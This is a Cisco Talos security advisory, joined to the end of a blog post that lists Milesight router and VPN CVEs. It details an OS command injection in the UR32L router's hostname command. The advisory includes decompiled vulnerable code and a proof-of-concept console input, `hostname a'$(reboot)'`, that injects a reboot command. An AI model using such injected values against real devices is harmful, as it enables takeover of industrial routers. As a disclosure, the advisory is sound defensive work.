*   TALOS-2023-1715 (CVE-2023-24018)
*   TALOS-2023-1716 (CVE-2023-25081 - CVE-2023-25124)
*   TALOS-2023-1718 (CVE-2023-24019)

TALOS-2023-1705 (CVE-2023-23546) is a misconfiguration vulnerability in the Milesight UR32L that could lead to an attacker obtaining increased privileges on the device. The adversary, in this case, would need to carry out a man-in-the-middle attack to exploit this vulnerability.

There is also an access violation vulnerability — TALOS-2023-1696 (CVE-2023-23571) — that could lead to a denial-of-service if the attacker sends the device a specially crafted network request. TALOS-2023-1695 (CVE-2023-23547) can also be exploited with a specially crafted network request, but in this case, can lead to arbitrary file read.

Talos also discovered five vulnerabilities in the MilesightVPN:

*   TALOS-2023-1700 (CVE-2023-22844): Authentication bypass vulnerability
*   TALOS-2023-1701 (CVE-2023-22319): SQL injection vulnerability
*   TALOS-2023-1702 (CVE-2023-23907): Directory traversal vulnerability
*   TALOS-2023-1703 (CVE-2023-22371): Command injection vulnerability
*   TALOS-2023-1704 (CVE-2023-24496 - CVE-2023-24497): Cross-site scripting vulnerability

**Coverage**

The following Snort rules will detect exploitation attempts against these vulnerabilities: 61206 – 61208, 61212, 61255 - 61258, 61266 - 61269, 61395 - 61397. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall or Snort.org.

Taking over Milesight UR32L routers behind a VPN: 22 vulnerabilities and a full chain

An os command injection vulnerability exists in the libzebra.so change_hostname functionality of Milesight UR32L v32.3.0.5. A specially-crafted network packets can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.

**SUMMARY**

An os command injection vulnerability exists in the libzebra.so change\_hostname functionality of Milesight UR32L v32.3.0.5. A specially-crafted network packets can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Milesight UR32L v32.3.0.5

**PRODUCT URLS**

UR32L - https://www.milesight-iot.com/cellular/router/ur32l/

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-77 - Improper Neutralization of Special Elements used in a Command (‘Command Injection’)

**DETAILS**

The Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.

The router offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console. This is an interactive shell to modify the router settings.

Here is the prompt after the login:

    *** TERMINFO:/etc/terminfo TERM:linux *****
    -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--
    
    -------------------------------------------------------------------------
    Product Model        : UR32L
    Firmware Version     : 32.3.0.5
    -------------------------------------------------------------------------
    
    ROUTER> 
    

The service has several functionalities, the number of functionalities depends also on the user privileges. Indeed, the admin user can access the enable command, that will allow to access an high privileges command menu:

    ROUTER> enable 
    ROUTER# 
      cellular-gps-dev
      clear             Reset functions
      configure         Configuration from vty interface
      copy              Copy from one file to another
      core              Set debug level
      debug             Debugging functions (see also 'undebug')
      disable           Turn off privileged mode command
      enable            Turn on privileged mode command
      end               End current mode and change to enable mode
      exit              Exit current mode and down to previous mode
      list              Print command list
      modbus-master
      no                Negate a command or set its defaults
      ping              Send echo messages
      quit              Exit current mode and down to previous mode
      reload            Halt and perform a cold restart
      show              Show running system information
      ssh               Open an ssh connection
      telnet            Open a telnet connection
      terminal          Set terminal line parameters
      test              Test
      traceroute        Trace route to destination
      undebug           Disable debugging functions (see also 'debug')
      write             Write running configuration to memory, network, or terminal
    

The command that we are going to analyze is called hostname. This function is called as hostname <new_hostname> and is used to change hostname for the device. This command is in the sub-menu reachable through the configure terminal command:

    ROUTER# configure terminal 
    ROUTER(config)# 
      [...]
      hostname              Set system's network name
      [...]
    

The libzebra.so.0.0.0’s hostname_command function is responsible for managing the hostname command:

    undefined4 hostname_command(undefined4 param_1,int param_2,undefined4 param_3,byte **argv)
    
    {
      undefined4 uVar1;
      char *pcVar2;
    
      if (0x19 < (**argv | 0x20) - 0x61) {
        [...]
      }
      uVar1 = change_hostname_wrap(argv);
      return uVar1;
    }
    

This function will check if the provided hostname starts with a letter of the alphabet, then the change_hostname_wrap function will be called with the new hostname. The function change_hostname_wrap will check if the current hostname differs from the new one, in such case the function change_hostname will be eventually called:

    void change_hostname(char *new_hostname)
    
    {
      int iVar1;
      char change_hostname_command [128];
    
      iVar1 = __stack_chk_guard;
      change_hostname_command._0_4_ = 0;
      memset(change_hostname_command + 4,0,0xfc);
      snprintf(change_hostname_command,0x100,"uci set system.@system[0].hostname='%s';uci commit",
               new_hostname);                                                                                       [1]
      system(change_hostname_command);                                                                              [2]
      [...]
    }
    

This function will compose, at [1], the uci set system.@system[0].hostname='<new_username>';uci commit string. The composed string will then be executed, at [2], using the system function. The change_hostname function is vulnerable to a command injection vulnerability, indeed, the new_hostname parameter it will reach the system function and the hostname command does only checks if the first character is alphabetic, this is not enough to prevent a command injection.

**Exploit Proof of Concept**

Following a POC triggering a reboot of the system through the command injection exposes above:

    *** TERMINFO:/etc/terminfo TERM:linux *****
    -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--
    
    -------------------------------------------------------------------------
    Product Model        : UR32L
    Firmware Version     : 32.3.0.5
    -------------------------------------------------------------------------
    
    ROUTER> enable
    ROUTER#  configure terminal
    ROUTER(config)# hostname a'$(reboot)'
    old hostname null
    a(config)# Connection closed by foreign host.
    

The Connection closed by foreign host. is the consequence of the device that is rebooting.

**VENDOR RESPONSE**

Since the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco’s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor\_vulnerability\_policy.html

**TIMELINE**

2023-02-14 - Initial Vendor Contact  
2023-02-21 - Vendor Disclosure  
2023-07-06 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

Tag

#linux